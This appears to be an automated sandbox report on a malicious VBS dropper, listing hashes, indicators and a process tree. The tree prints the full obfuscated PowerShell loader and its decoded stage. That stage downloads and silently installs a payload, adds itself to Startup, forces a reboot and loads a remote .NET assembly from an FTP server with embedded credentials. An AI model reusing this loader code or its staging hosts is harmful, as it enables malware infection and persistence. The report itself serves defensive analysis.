c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e

General

Target

c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs
Size

691KB
MD5

56258f68ad095965e7ef46b623d68619
SHA1

780a03a86b36e69f5169905fa52bc352b1c993a2
SHA256

c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e
SHA512

4461f4de2fb0dc61e0e0dc62347eca655e4980ad3f222453a3dbfb6533b13b6bee9ee9cbf122db508639968fdb671b42154d1460ac6e967d47b3fd5518f96a3f
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE77777777777777777777777777777777777777v:45VLpOe/

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2136	powershell.exe
2992	powershell.exe
2824	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2136	powershell.exe
2992	powershell.exe
2352	powershell.exe
2824	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1056 wrote to memory of 2136	1056	WScript.exe	28
PID 1056 wrote to memory of 2136	1056	WScript.exe	28
PID 1056 wrote to memory of 2136	1056	WScript.exe	28
PID 2136 wrote to memory of 2992	2136	powershell.exe	30
PID 2136 wrote to memory of 2992	2136	powershell.exe	30
PID 2136 wrote to memory of 2992	2136	powershell.exe	30
PID 2992 wrote to memory of 2352	2992	powershell.exe	31
PID 2992 wrote to memory of 2352	2992	powershell.exe	31
PID 2992 wrote to memory of 2352	2992	powershell.exe	31
PID 2352 wrote to memory of 2724	2352	powershell.exe	32
PID 2352 wrote to memory of 2724	2352	powershell.exe	32
PID 2352 wrote to memory of 2724	2352	powershell.exe	32
PID 2992 wrote to memory of 2824	2992	powershell.exe	33
PID 2992 wrote to memory of 2824	2992	powershell.exe	33
PID 2992 wrote to memory of 2824	2992	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉDEШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉaШḆЉB0ШḆЉHQШḆЉcШḆЉBzШḆЉDoШḆЉLwШḆЉvШḆЉHШḆЉШḆЉNwШḆЉuШḆЉHQШḆЉcgШḆЉxШḆЉC4ШḆЉbgШḆЉwШḆЉC4ШḆЉYwBkШḆЉG4ШḆЉLgB6ШḆЉGkШḆЉZwBoШḆЉHQШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉGkШḆЉdШḆЉBlШḆЉG0ШḆЉcwШḆЉvШḆЉEEШḆЉcШḆЉB1ШḆЉHEШḆЉSwBSШḆЉHcШḆЉSgШḆЉvШḆЉDgШḆЉNgBhШḆЉDШḆЉШḆЉOШḆЉBiШḆЉDMШḆЉZQШḆЉtШḆЉGYШḆЉYwШḆЉzШḆЉGIШḆЉLQШḆЉ0ШḆЉGUШḆЉMwШḆЉ2ШḆЉC0ШḆЉYQШḆЉxШḆЉDQШḆЉNgШḆЉtШḆЉGYШḆЉZQШḆЉyШḆЉDШḆЉШḆЉNgШḆЉ0ШḆЉDkШḆЉNQBlШḆЉDYШḆЉYwШḆЉ2ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉPwByШḆЉGUШḆЉcwBwШḆЉG8ШḆЉbgBzШḆЉGUШḆЉLQBjШḆЉG8ШḆЉbgB0ШḆЉGUШḆЉbgB0ШḆЉC0ШḆЉZШḆЉBpШḆЉHMШḆЉcШḆЉBvШḆЉHMШḆЉaQB0ШḆЉGkШḆЉbwBuШḆЉD0ШḆЉYQB0ШḆЉHQШḆЉYQBjШḆЉGgШḆЉbQBlШḆЉG4ШḆЉdШḆЉШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDMШḆЉRШḆЉШḆЉlШḆЉDIШḆЉMgШḆЉwШḆЉDcШḆЉLgШḆЉwШḆЉDgШḆЉLgШḆЉyШḆЉDШḆЉШḆЉMgШḆЉ0ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉJQШḆЉyШḆЉDIШḆЉJQШḆЉzШḆЉEIШḆЉKwBmШḆЉGkШḆЉbШḆЉBlШḆЉG4ШḆЉYQBtШḆЉGUШḆЉJQШḆЉyШḆЉEEШḆЉJQШḆЉzШḆЉEQШḆЉVQBUШḆЉEYШḆЉLQШḆЉ4ШḆЉCUШḆЉMgШḆЉ3ШḆЉCUШḆЉMgШḆЉ3ШḆЉDШḆЉШḆЉNwШḆЉuШḆЉDШḆЉШḆЉOШḆЉШḆЉuШḆЉDIШḆЉMШḆЉШḆЉyШḆЉDQШḆЉLgB0ШḆЉHgШḆЉdШḆЉШḆЉmШḆЉHMШḆЉbwB1ШḆЉHIШḆЉYwBlШḆЉD0ШḆЉZШḆЉBvШḆЉHcШḆЉbgBsШḆЉG8ШḆЉYQBkШḆЉCYШḆЉdgШḆЉ9ШḆЉCUШḆЉMgШḆЉyШḆЉGEШḆЉNgBhШḆЉDQШḆЉMQШḆЉ3ШḆЉDUШḆЉNgBmШḆЉDgШḆЉOШḆЉBiШḆЉDQШḆЉZQШḆЉxШḆЉDUШḆЉNQBmШḆЉGQШḆЉOШḆЉШḆЉzШḆЉDШḆЉШḆЉMШḆЉШḆЉwШḆЉDIШḆЉNgBhШḆЉGMШḆЉYgШḆЉzШḆЉDEШḆЉMwШḆЉlШḆЉDIШḆЉMgШḆЉnШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉFsШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉbШḆЉBsШḆЉHUШḆЉbgШḆЉkШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGsШḆЉbwB2ШḆЉG4ШḆЉSQШḆЉuШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEkШḆЉVgBGШḆЉHIШḆЉcШḆЉШḆЉnШḆЉCШḆЉШḆЉKШḆЉBkШḆЉG8ШḆЉaШḆЉB0ШḆЉGUШḆЉTQB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉJwШḆЉxШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉuШḆЉDMШḆЉeQByШḆЉGEШḆЉcgBiШḆЉGkШḆЉTШḆЉBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉJwШḆЉoШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGQШḆЉYQBvШḆЉEwШḆЉLgBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉB0ШḆЉG4ШḆЉZQByШḆЉHIШḆЉdQBDШḆЉDoШḆЉOgBdШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBBШḆЉCcШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉJwCTIToШḆЉkyEnШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGMШḆЉYQBsШḆЉHШḆЉШḆЉZQBSШḆЉC4ШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉoШḆЉGUШḆЉcwBvШḆЉHШḆЉШḆЉcwBpШḆЉGQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHQШḆЉeШḆЉB0ШḆЉC4ШḆЉMQШḆЉwШḆЉEwШḆЉTШḆЉBEШḆЉC8ШḆЉMQШḆЉwШḆЉC8ШḆЉcgBlШḆЉHQШḆЉcШḆЉB5ШḆЉHIШḆЉYwBwШḆЉFUШḆЉLwByШḆЉGIШḆЉLgBtШḆЉG8ШḆЉYwШḆЉuШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLgBwШḆЉHQШḆЉZgBШḆЉШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉvШḆЉC8ШḆЉOgBwШḆЉHQШḆЉZgШḆЉnШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉG4ШḆЉWgB3ШḆЉEEШḆЉRwШḆЉkШḆЉDsШḆЉMgШḆЉxШḆЉHMШḆЉbШḆЉBUШḆЉDoШḆЉOgBdШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉbШḆЉBvШḆЉGMШḆЉbwB0ШḆЉG8ШḆЉcgBQШḆЉHkШḆЉdШḆЉBpШḆЉHIШḆЉdQBjШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwB9ШḆЉGUШḆЉdQByШḆЉHQШḆЉJШḆЉB7ШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGsШḆЉYwBhШḆЉGIШḆЉbШḆЉBsШḆЉGEШḆЉQwBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉZШḆЉBpШḆЉGwШḆЉYQBWШḆЉGUШḆЉdШḆЉBhШḆЉGMШḆЉaQBmШḆЉGkШḆЉdШḆЉByШḆЉGUШḆЉQwByШḆЉGUШḆЉdgByШḆЉGUШḆЉUwШḆЉ6ШḆЉDoШḆЉXQByШḆЉGUШḆЉZwBhШḆЉG4ШḆЉYQBNШḆЉHQШḆЉbgBpШḆЉG8ШḆЉUШḆЉBlШḆЉGMШḆЉaQB2ШḆЉHIШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉIШḆЉBmШḆЉC8ШḆЉIШḆЉШḆЉwШḆЉCШḆЉШḆЉdШḆЉШḆЉvШḆЉCШḆЉШḆЉcgШḆЉvШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBuШḆЉHcШḆЉbwBkШḆЉHQШḆЉdQBoШḆЉHMШḆЉIШḆЉШḆЉ7ШḆЉCcШḆЉMШḆЉШḆЉ4ШḆЉDEШḆЉIШḆЉBwШḆЉGUШḆЉZQBsШḆЉHMШḆЉJwШḆЉgШḆЉGQШḆЉbgBhШḆЉG0ШḆЉbQBvШḆЉGMШḆЉLQШḆЉgШḆЉGUШḆЉeШḆЉBlШḆЉC4ШḆЉbШḆЉBsШḆЉGUШḆЉaШḆЉBzШḆЉHIШḆЉZQB3ШḆЉG8ШḆЉcШḆЉШḆЉ7ШḆЉCШḆЉШḆЉZQBjШḆЉHIШḆЉbwBmШḆЉC0ШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwBtШḆЉGEШḆЉcgBnШḆЉG8ШḆЉcgBQШḆЉFwШḆЉdQBuШḆЉGUШḆЉTQШḆЉgШḆЉHQШḆЉcgBhШḆЉHQШḆЉUwBcШḆЉHMШḆЉdwBvШḆЉGQШḆЉbgBpШḆЉFcШḆЉXШḆЉB0ШḆЉGYШḆЉbwBzШḆЉG8ШḆЉcgBjШḆЉGkШḆЉTQBcШḆЉGcШḆЉbgBpШḆЉG0ШḆЉYQBvШḆЉFIШḆЉXШḆЉBhШḆЉHQШḆЉYQBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉgШḆЉCgШḆЉIШḆЉBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉbgBpШḆЉHQШḆЉcwBlШḆЉEQШḆЉLQШḆЉgШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉbQBlШḆЉHQШḆЉSQШḆЉtШḆЉHkШḆЉcШḆЉBvШḆЉEMШḆЉIШḆЉШḆЉ7ШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBzШḆЉGUШḆЉcgBvШḆЉG4ШḆЉLwШḆЉgШḆЉHQШḆЉZQBpШḆЉHUШḆЉcQШḆЉvШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBhШḆЉHMШḆЉdQB3ШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉCШḆЉШḆЉOwШḆЉpШḆЉCcШḆЉdQBzШḆЉG0ШḆЉLgBuШḆЉGkШḆЉdwBwШḆЉFUШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉGEШḆЉdШḆЉBzШḆЉGEШḆЉcШḆЉШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉGUШḆЉbQBhШḆЉE4ШḆЉcgBlШḆЉHMШḆЉVQШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉG4ШḆЉZQBtШḆЉG4ШḆЉbwByШḆЉGkШḆЉdgBuШḆЉEUШḆЉWwШḆЉgШḆЉCsШḆЉIШḆЉШḆЉnШḆЉFwШḆЉcwByШḆЉGUШḆЉcwBVШḆЉFwШḆЉOgBDШḆЉCcШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉYQB0ШḆЉHMШḆЉYQBwШḆЉCQШḆЉIШḆЉШḆЉsШḆЉEIШḆЉSwBMШḆЉFIШḆЉVQШḆЉkШḆЉCgШḆЉZQBsШḆЉGkШḆЉRgBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉHMШḆЉVQBIШḆЉHUШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwB9ШḆЉDsШḆЉIШḆЉШḆЉpШḆЉCcШḆЉcgBnШḆЉDgШḆЉRШḆЉШḆЉ3ШḆЉG8ШḆЉUgBzШḆЉGYШḆЉVgBjШḆЉHIШḆЉMgBuШḆЉEEШḆЉaШḆЉBmШḆЉGgШḆЉVgШḆЉ2ШḆЉEQШḆЉQwB4ШḆЉFIШḆЉcQBuШḆЉHEШḆЉagШḆЉ1ШḆЉGoШḆЉcgBiШḆЉDEШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBQШḆЉHШḆЉШḆЉVgBpШḆЉHMШḆЉJШḆЉШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwB4ШḆЉDQШḆЉZgBoШḆЉFoШḆЉTQB3ШḆЉE4ШḆЉNwBVШḆЉGUШḆЉXwШḆЉwШḆЉF8ШḆЉNQBfШḆЉGkШḆЉYwBzШḆЉGIШḆЉaШḆЉШḆЉ3ШḆЉEMШḆЉUШḆЉШḆЉwШḆЉEkШḆЉZgBQШḆЉGQШḆЉQQШḆЉyШḆЉDEШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcABWAGkAcwAkACgAIAA9ACAAUABwAFYAaQBzACQAewAgACkAbwBHAGYARABRACQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAbwBHAGYARABRACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAFAAcABWAGkAcwAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAEgAQgBaAGoARgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABIAEIAWgBqAEYAJAAgADsA';$RIyag = $qCybe.replace('ШḆЉ' , 'A') ;$gsoKZ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $RIyag ) ); $gsoKZ = $gsoKZ[-1..-$gsoKZ.Length] -join '';$gsoKZ = $gsoKZ.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs');powershell $gsoKZ
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $FjZBH = $host.Version.Major.Equals(2) ;if ($FjZBH) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$uHUso = (New-Object Net.WebClient);$uHUso.Encoding = [System.Text.Encoding]::UTF8;$uHUso.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $lqVmC.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '22%313bca6200038df551e4b88f65714a6a22%=v&daolnwod=ecruos&txt.4202.80.7072%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.80.7022%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.6c6e594602ef-641a-63e4-b3cf-e3b80a68/JwRKqupA/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
